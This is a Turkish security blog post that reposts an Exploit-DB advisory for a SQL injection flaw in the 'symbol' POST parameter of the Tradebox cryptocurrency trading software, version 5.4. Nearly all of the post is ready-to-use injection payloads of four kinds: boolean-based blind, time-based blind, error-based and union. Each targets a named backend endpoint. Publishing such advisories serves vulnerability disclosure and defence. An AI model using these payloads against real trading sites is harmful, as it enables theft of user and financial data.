İçeriğe geç
  • Anasayfa
  • Siber Saldırılar ve Güvenlik
  • Teknoloji-Bilim
  • Hacking
  • Malware
  • Exploits | Vulnerabilities
  • Araştırma | Analiz
  • Hakkımda
  • İletişim
  • Privacy Policy

Cyber Security Manager Blog

Siber Güvenlik ve Adli Bilişim Hakkında Kişisel Blok

Yayın tarihi Nisan 8, 2019

Tradebox CryptoCurrency – ‘symbol’ SQL Injection

 # Title: Tradebox - CryptoCurrency Buy Sell and Trading
# Date: 04.04.2019
# Exploit Author: Abdullah Çelebi
# Vendor Homepage: https://www.bdtask.com
# Software Link: tradebox.bdtask.com/demo-v5.3/
# Version: 5.4
# Category: Webapps
# Tested on: WAMPP @Win
# Software description:
Tradebox – CryptoCurrency Buy Sell and Trading Software. Tradebox is for
the cryptocurrency trading and selling.even you can request for buy and
sell at a specific price. There have withdrawal and deposit option.

# Vulnerabilities:
# An attacker can access all data following an authorized user login using
the parameter.


# POC - SQLi :

# Parameter: symbol (POST)
# Request URL: http://localhost/backend/dashboard/home/monthly_deposit
#    Type : boolean-based blind
csrf_test_name=53d7718e6ed975d198e33cfcad7def47&symbol=USD' AND 8149=8149
AND 'PuLt'='PuLt

#    Type : time-based blind
csrf_test_name=53d7718e6ed975d198e33cfcad7def47&symbol=USD' OR (SELECT *
FROM (SELECT(SLEEP(5)))rBnp) AND 'wNyS'='wNyS

#    Type : error-based
csrf_test_name=53d7718e6ed975d198e33cfcad7def47&symbol=USD' AND (SELECT
5276 FROM(SELECT COUNT(*),CONCAT(0x7162707671,(SELECT
(ELT(5276=5276,1))),0x7171787171,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CnKo'='CnKo

#    Type : generic union
csrf_test_name=53d7718e6ed975d198e33cfcad7def47&symbol=USD' UNION ALL
SELECT
NULL,CONCAT(0x7162707671,0x75664d4466634a4d505554424d6d6a577957506a51534d734c6e7551516f436f71444e77796f4a63,0x7171787171)--
Lzbq

Exploit-DB
Kategoriler Exploits | VulnerabilitiesEtiketlerattacker, cryptocurrency, CryptoCurrency Buy Sell and Trading, Hack, Hacking, PoC, software, SQL, SQL Injection, SQLi, user login, Vulnerabilities, WAMPP

Yazı dolaşımı

Önceki Önceki yazı: Siber İstihbarat ve Siber Savaşlar
Sonraki Sıradaki Yazı: BalKüpü (Honeypot) Nedir?

Menü

  • Anasayfa
  • Siber Saldırılar ve Güvenlik
  • Teknoloji-Bilim
  • Hacking
  • Malware
  • Exploits | Vulnerabilities
  • Araştırma | Analiz
  • Hakkımda
  • İletişim
  • Privacy Policy

Recent Posts

  • Cisco E-posta ve Web Yöneticisindeki Kritik Kusur
  • Zimbra E-posta Güvenlik Açığı
  • Kritik UNISOC Çip Güvenlik Açığı
  • Android Telefonlarda Lost.DIR Klasörü
  • Zyxel USG FLEX 100(W) Donanım Yazılımı Güvenlik Açığı

Recent Comments

Gösterilecek yorum yok.

Archives

  • Haziran 2022
  • Mayıs 2022
  • Temmuz 2021
  • Mayıs 2019
  • Nisan 2019
  • Mart 2019
  • Şubat 2019
  • Ocak 2019
  • Aralık 2018
  • Kasım 2018
  • Ekim 2018
  • Eylül 2018
  • Ağustos 2018
  • Temmuz 2018
  • Haziran 2018
  • Mayıs 2018
  • Nisan 2018
  • Mart 2018
  • Ocak 2018
  • Aralık 2017
  • Kasım 2017
  • Ekim 2017
  • Eylül 2017
  • Ağustos 2017
  • Temmuz 2017
  • Haziran 2017
  • Mayıs 2017
  • Nisan 2017
  • Mart 2017
  • Şubat 2017
  • Ocak 2017
  • Aralık 2016
  • Kasım 2016
  • Ekim 2016
  • Eylül 2016
  • Ağustos 2016
  • Temmuz 2016
  • Haziran 2016
  • Mayıs 2016
  • Nisan 2016
  • Mart 2016
  • Şubat 2016
  • Temmuz 2010

Categories

  • Araştırma | Analiz
  • Exploits | Vulnerabilities
  • Hacking
  • Malware
  • Siber Saldırılar ve Güvenlik
  • Teknoloji-Bilim
WordPress gururla sunar | Tema: WordPress.com tarafından Afterlight.